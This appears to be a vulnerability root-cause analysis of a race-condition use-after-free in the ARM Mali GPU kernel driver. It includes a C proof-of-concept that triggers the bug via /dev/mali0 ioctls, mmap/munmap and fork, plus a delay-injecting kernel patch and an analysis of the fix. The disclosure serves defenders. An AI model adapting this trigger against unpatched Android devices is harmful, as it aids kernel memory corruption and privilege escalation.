Maddie Stone & Jann Horn

The Basics

Disclosure or Patch Date: October 2, 2023

Product: ARM Mali GPU Driver

Advisory:

Affected Versions:

Android: Pre-Security Patch Level October 2023

ARM:

  • Midgard GPU Kernel Driver: All versions from r12p0 - r32p0
  • Bifrost GPU Kernel Driver: All versions from r0p0 - r42p0
  • Valhall GPU Kernel Driver: All versions from r19p0 - r42p0
  • Arm 5th Gen GPU Architecture Kernel Driver: All versions from r41p0 - r42p0

First Patched Version:

  • Android SPL 2023-10-05
  • ARM Mali GPU driver r43

Issue/Bug Report: N/A

Patch CL: https://android.googlesource.com/kernel/google-modules/gpu/+/35feb9b795cf1cd0d9a0a2edb6ade3c83040f48b%5E%21/

Bug-Introducing CL: N/A

Reporter(s): Maddie Stone of Google's Threat Analysis Group and Jann Horn of Google Project Zero

The Code

Proof-of-concept:

We added a patch (repro-kpatch-delay.patch) to the kernel to add a 5 second delay into kbasep_os_process_page_usage_drain to trigger the POC:

diff -r -U5 software/arm/VX504X08X-SW-99002-r42p0-01eac0/driver/product/kernel/drivers/gpu/arm/midgard/mali_kbase_mem_linux.c git/foreign/linux3/drivers/gpu/arm/midgard/mali_kbase_mem_linux.c
--- software/arm/VX504X08X-SW-99002-r42p0-01eac0/driver/product/kernel/drivers/gpu/arm/midgard/mali_kbase_mem_linux.c	2023-01-27 13:02:25.000000000 +0100
+++ git/foreign/linux3/drivers/gpu/arm/midgard/mali_kbase_mem_linux.c	2023-08-04 02:07:06.833708970 +0200
@@ -35,10 +35,11 @@
 #include <linux/shrinker.h>
 #include <linux/cache.h>
 #include <linux/memory_group_manager.h>
 #include <linux/math64.h>
 #include <linux/migrate.h>
+#include <linux/delay.h>

 #include <mali_kbase.h>
 #include <mali_kbase_mem_linux.h>
 #include <tl/mali_kbase_tracepoints.h>
 #include <uapi/gpu/arm/midgard/mali_kbase_ioctl.h>
@@ -3409,10 +3410,16 @@

 	rcu_assign_pointer(kctx->process_mm, NULL);
 	spin_unlock(&kctx->mm_update_lock);
 	synchronize_rcu();

+	if (strcmp(current->comm, "SLOWME") == 0) {
+		pr_warn("%s: begin delay injection\n", __func__);
+		mdelay(5000);
+		pr_warn("%s: end delay injection\n", __func__);
+	}
+
 	pages = atomic_xchg(&kctx->nonmapped_pages, 0);
 #ifdef SPLIT_RSS_COUNTING
 	kbasep_add_mm_counter(mm, MM_FILEPAGES, -pages);
 #else
 	spin_lock(&mm->page_table_lock);

poc.c:

#define _GNU_SOURCE
#include <fcntl.h>
#include <err.h>
#include <stdint.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/prctl.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

#define KBASE_IOCTL_TYPE 0x80

#define __u8  uint8_t
#define __u16 uint16_t
#define __u32 uint32_t
#define __u64 uint64_t

struct kbase_ioctl_version_check {
        __u16 major;
        __u16 minor;
};
#define KBASE_IOCTL_VERSION_CHECK \
        _IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check)

struct kbase_ioctl_set_flags {
        __u32 create_flags;
};
#define KBASE_IOCTL_SET_FLAGS \
        _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags)

#define LOCAL_PAGE_SHIFT 12
#define BASE_MEM_MAP_TRACKING_HANDLE (3ul << LOCAL_PAGE_SHIFT)

int main(void) {
  int mali_fd = SYSCHK(open("/dev/mali0", O_RDWR));

  struct kbase_ioctl_version_check vc = {
    .major = 11,
    .minor = 11
  };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_VERSION_CHECK, &vc));
  struct kbase_ioctl_set_flags set_flags = { .create_flags = 0 };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_SET_FLAGS, &set_flags));

  /* will not be copied to child, mali sets VM_DONTCOPY */
  void *parent_tracking_page = SYSCHK(mmap(NULL, 0x2000, PROT_NONE, MAP_SHARED,
        mali_fd, BASE_MEM_MAP_TRACKING_HANDLE));

  /* causes split and close handler invocation */
  SYSCHK(munmap(parent_tracking_page+0x1000, 0x1000));

  SYSCHK(signal(SIGCHLD, SIG_IGN));
  pid_t child = SYSCHK(fork());
  if (child == 0) {
    SYSCHK(prctl(PR_SET_NAME, "CHILD"));
    void *child_tracking_page = SYSCHK(mmap(NULL, 0x1000, PROT_NONE, MAP_SHARED,
          mali_fd, BASE_MEM_MAP_TRACKING_HANDLE));
    sleep(2);
    /* invoke close handler, inner side of race */
    SYSCHK(munmap(child_tracking_page, 0x1000));
    /* free mm */
    exit(0);
  }

  sleep(1);
  SYSCHK(prctl(PR_SET_NAME, "SLOWME"));
  /* invoke close handler, outer side of race */
  SYSCHK(munmap(parent_tracking_page, 0x1000)); /* KERNEL-PATCH-ASSISTED DELAY 5 SECONDS */
  SYSCHK(prctl(PR_SET_NAME, "PARENT"));
}

Exploit sample: N/A

Did you have access to the exploit sample when doing the analysis? Yes

The Vulnerability

Bug class: Use-after-free

Vulnerability details:

The bug is in the handling of the "tracking page" VMA. The intention is that for a given Mali context, only a single "tracking page" VMA can exist at a time. "tracking page" VMAs are set up using kbase_tracking_page_setup(). This function tries to enforce the "only one tracking page can exist" rule by setting the flags VM_DONTCOPY and VM_IO (to prevent copying the VMA into a child process), by setting the flag VM_DONTEXPAND (to prevent expansion of the VMA), and by checking kctx->process_mm under the kctx->mm_update_lock spinlock to ensure that there can not already be a tracking page VMA.

When a tracking page VMA is torn down, kbasep_os_process_page_usage_drain() is called; this function is responsible for setting kctx->process_mm back to NULL (under the kctx->mm_update_lock)[1] and doing some bookkeeping work on the old kctx->process_mm. This final bookkeeping (kbasep_add_mm_counter()) happens after dropping the kctx->mm_update_lock [2], and without holding any explicit reference on the kctx->process_mm [3]; but if everything is working correctly and there can only be one tracking page VMA at a time, kctx->process_mm would be guaranteed to be current->mm, which would make this fine.

However, before Mali r43, it is possible to create a multi-page tracking VMA, and then split this VMA into several VMAs (for example using munmap()), which breaks the assumption that only one tracking VMA can exist at a time.

This makes the following sequence of events possible:

  1. Process A sets up a mali context (by opening /dev/mali0 and using the KBASE_IOCTL_VERSION_CHECK and KBASE_IOCTL_SET_FLAGS ioctls)
  2. Process A creates a tracking page VMA with size 0x2000 (this sets kctx->process_mm to the mm_struct of process A)
  3. Process A unmaps 0x1000 bytes of its tracking VMA with munmap(), but leaves the other 0x1000 bytes mapped (this first splits the VMA into two, then removes one of the two VMAs, resulting in kbasep_os_process_page_usage_drain() setting kctx->process_mm back to NULL and doing final bookkeeping on the mm_struct of process A).
  4. Process A forks, creating process B
  5. Process B creates a tracking page VMA with size 0x1000 (this sets kctx->process_mm to the mm_struct of process B)
  6. Process A begins calling munmap() on its remaining tracking VMA; this syscall runs until the point in kbasep_os_process_page_usage_drain() where the old kctx->process_mm (pointing to the mm_struct of Process B) has been read, kctx->process_mm has been set to NULL and the kctx->mm_update_lock has been dropped, then gets preempted somewhere in synchronize_rcu()
  7. Process B exits. this involves unmapping the tracking VMA of process B; kbasep_os_process_page_usage_drain() will take the kctx->mm_update_lock, observe that kctx->process_mm is already NULL, drop the lock and return. process B continues to exit and frees its mm_struct.
  8. Process A continues execution of kbasep_os_process_page_usage_drain() with mm pointing to the freed mm_struct of process B. When it tries to do final bookkeeping on this mm_struct, which has already been freed, UAF write occurs.
static void kbasep_os_process_page_usage_drain(struct kbase_context *kctx)
{
	int pages;
	struct mm_struct *mm;
	spin_lock(&kctx->mm_update_lock);
	mm = rcu_dereference_protected(kctx->process_mm, lockdep_is_held(&kctx->mm_update_lock));
	if (!mm) {
		spin_unlock(&kctx->mm_update_lock);
		return;
	}
	rcu_assign_pointer(kctx->process_mm, NULL);      // ** 1 **
	spin_unlock(&kctx->mm_update_lock);              // ** 2 **
	synchronize_rcu();                          // ** PREEMPTION HERE **
	pages = atomic_xchg(&kctx->nonmapped_pages, 0);

#ifdef SPLIT_RSS_COUNTING
	kbasep_add_mm_counter(mm, MM_FILEPAGES, -pages); // ** 3 **
#else
	spin_lock(&mm->page_table_lock);
	kbasep_add_mm_counter(mm, MM_FILEPAGES, -pages);
	spin_unlock(&mm->page_table_lock);
#endif
}

Patch analysis:

kctx->process_mm is now managed differently: Instead of setting up and clearing kctx->process_mm when the tracking page is mapped, the driver now sets up kctx->process_mm in kbase_context_common_init(), when a kbase_context is set up, and clears it in kbase_context_common_term() when a kbase_context is torn down.

Effectively, the driver removed support for opening the mali device in process A and then interacting with it from process B; apparently, while the kernel driver supported this, it was unnecessary complexity.

Additionally, kbase_tracking_page_setup now enforces that there can only be one tracking VMA page, and it exits with an error if vma_pages(vma) != 1; but the tracking page is no longer actually used for anything, so that shouldn't really matter anymore.

Thoughts on how this vuln might have been found (fuzzing, code auditing, variant analysis, etc.):

(Historical/present/future) context of bug:

The Exploit

(The terms exploit primitive, exploit strategy, exploit technique, and exploit flow are defined here.)

Exploit strategy (or strategies):

Exploit flow:

Known cases of the same exploit flow:

Part of an exploit chain?

The Next Steps

Variant analysis

Areas/approach for variant analysis (and why):

Found variants:

Structural improvements

What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.?

Ideas to kill the bug class:

Ideas to mitigate the exploit flow:

Other potential improvements:

0-day detection methods

What are potential detection methods for similar 0-days? Meaning are there any ideas of how this exploit or similar exploits could be detected as a 0-day?

Other References